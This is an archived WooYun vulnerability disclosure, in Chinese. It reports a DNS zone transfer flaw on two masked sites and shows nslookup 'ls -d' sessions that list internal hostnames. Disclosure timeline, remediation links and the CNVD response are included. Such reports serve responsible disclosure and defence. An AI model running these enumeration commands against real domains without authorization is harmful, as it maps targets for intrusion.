乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-17: 细节已通知厂商并且等待厂商处理中 2015-09-19: 厂商已经确认,细节仅向厂商公开 2015-09-29: 细节向核心白帽子及相关领域专家公开 2015-10-09: 细节向普通白帽子公开 2015-10-19: 细节向实习白帽子公开 2015-11-03: 细节向公众公开
RT
域传送漏洞的危害:黑客可以快速的判定出某个特定zone的所有主机,收集域信息,选择攻击目标,找出未使用的IP地址,黑客可以绕过基于网络的访问控制0x01:主站地址 **.**.**.**
C:\Users\Layert>nslookup默认服务器: **.**.**.**Address: **.**.**.**> set type=ns> **.**.**.**服务器: **.**.**.**Address: **.**.**.****.**.**.** primary name server = ns.**.**.**.** responsible mail addr = root.**.**.**.** serial = 2014101501 refresh = 2880 (48 mins) retry = 14400 (4 hours) expire = 3600 (1 hour) default TTL = 8600 (2 hours 23 mins 20 secs)> server ns.**.**.**.**默认服务器: ns.**.**.**.**Address: **.**.**.**> ls -d **.**.**.**
0x02:泄露大量域名主机信息
> ls -d **.**.**.**[ns.**.**.**.**] **.**.**.**. SOA ns.**.**.**.** root.**.**.**.**. (2014101501 2880 14400 3600 8600) **.**.**.**. NS ns.**.**.**.** **.**.**.**. NS ns2.**.**.**.** **.**.**.**. MX 10 mail.**.**.**.** **.**.**.**. TXT "v=spf1 ip4:**.**.**.** -all" 360 A **.**.**.** 9star A **.**.**.** anti-spam A **.**.**.** apabi A **.**.**.** av CNAME virus.**.**.**.** bbs A **.**.**.**01 book A **.**.**.** bqwrc CNAME zftt.**.**.**.** ca A **.**.**.** cag-shy A **.**.**.** cbs CNAME wwwj.**.**.**.** ceal A **.**.**.** cepa A **.**.**.** ciscolab A **.**.**.** cnki A **.**.**.** cxbook A **.**.**.** dmz-nas A **.**.**.**5 dmz-zh A **.**.**.** dt1000 A **.**.**.** dt1500 A **.**.**.** dzzw A **.**.**.** e-gov A **.**.**.** fanglue A **.**.**.** it CNAME www-old.**.**.**.** jdzy-ssl A **.**.**.** jgdj CNAME lzjy.**.**.**.** jhzggs A **.**.**.**13 jxdx A **.**.**.** jxgl A **.**.**.** jxpgxt A **.**.**.** kaoqin A **.**.**.** kp A **.**.**.** kp2 A **.**.**.** kp3 A **.**.**.** kpglxt A **.**.**.**03 kspider A **.**.**.** kyhz A **.**.**.**1 lib A **.**.**.** lib1 A **.**.**.** lib2 A **.**.**.** lzjy A **.**.**.** mail A **.**.**.** mpa CNAME www-old.**.**.**.** mrtg A **.**.**.** ms-ca A **.**.**.** ms-wsus A **.**.**.** ns A **.**.**.** ns2 A **.**.**.**27 nsa-zzxx A **.**.**.** nsaedu A **.**.**.** nsaww A **.**.**.** oa A **.**.**.** openinfo A **.**.**.** pman A **.**.**.** pop3 A **.**.**.** qnbjrc CNAME zftt.**.**.**.** ra A **.**.**.** raas A **.**.**.** rmgpw A **.**.**.** rmgpw-zjw-video A **.**.**.**9 rsgl A **.**.**.** rsj A **.**.**.**4 sgyprc CNAME zftt.**.**.**.** share A **.**.**.** sms A **.**.**.** sms3n A **.**.**.**20 smtp A **.**.**.** software CNAME www-old.**.**.**.** sskt A **.**.**.** ssreader A **.**.**.** svn-server A **.**.**.** time A **.**.**.**3 tongf A **.**.**.** video A **.**.**.** virus A **.**.**.**0 vmeeting A **.**.**.** vod A **.**.**.**2 vpn A **.**.**.**35 vpn2 A **.**.**.**21 wljx A **.**.**.** www A **.**.**.** www-old A **.**.**.** www2 A **.**.**.** wwwj A **.**.**.** xxhpgxt A **.**.**.**8 yjs A **.**.**.** yks A **.**.**.** yxcbs A **.**.**.** yzlt A **.**.**.**3 zfjj CNAME cepa.**.**.**.** zftt A **.**.**.**6 **.**.**.**. SOA ns.**.**.**.** root.**.**.**.**. (2014101501 2880 14400 3600 8600)> http://**.**.**.**/
0x03:截图证明
0x01:主站地址
**.**.**.**
0x02:漏洞证明
默认服务器: **.**.**.**Address: **.**.**.**> set type=ns> **.**.**.**服务器: **.**.**.**Address: **.**.**.**非权威应答:**.**.**.** nameserver = ns.**.**.**.**> server ns.**.**.**.**默认服务器: ns.**.**.**.**Address: **.**.**.**> ls -d **.**.**.**[ns.**.**.**.**] **.**.**.**. SOA ns.**.**.**.** root.ns.**.**.**.**. (2004072014 28800 7200 604800 3600) **.**.**.**. MX 10 webmail.**.**.**.** **.**.**.**. NS ns.**.**.**.** fw A **.**.**.** fwgl A **.**.**.** mail A **.**.**.** mail1 CNAME webmail.**.**.**.** nrfw A **.**.**.** ns A **.**.**.** presscard A **.**.**.** teamwork A **.**.**.** webmail A **.**.**.** www A **.**.**.** youth A **.**.**.** **.**.**.**. SOA ns.**.**.**.** root.ns.**.**.**.**. (2004072014 28800 7200 604800 3600)> **.**.**.****.**.**.****.**.**.**
0x03:截图证明
关于修复,建议看一下这里提到的:http://**.**.**.**/Article/201204/125817.htmlhttp://**.**.**.**/u013648937/article/details/48215157
危害等级:中
漏洞Rank:9
确认时间:2015-09-19 18:20
CNVD确认所述情况,已经转由CNCERT向国家上级信息安全协调机构上报同时转由CNCERT向北京分中心通报,由其后续协调网站管理单位处置。
暂无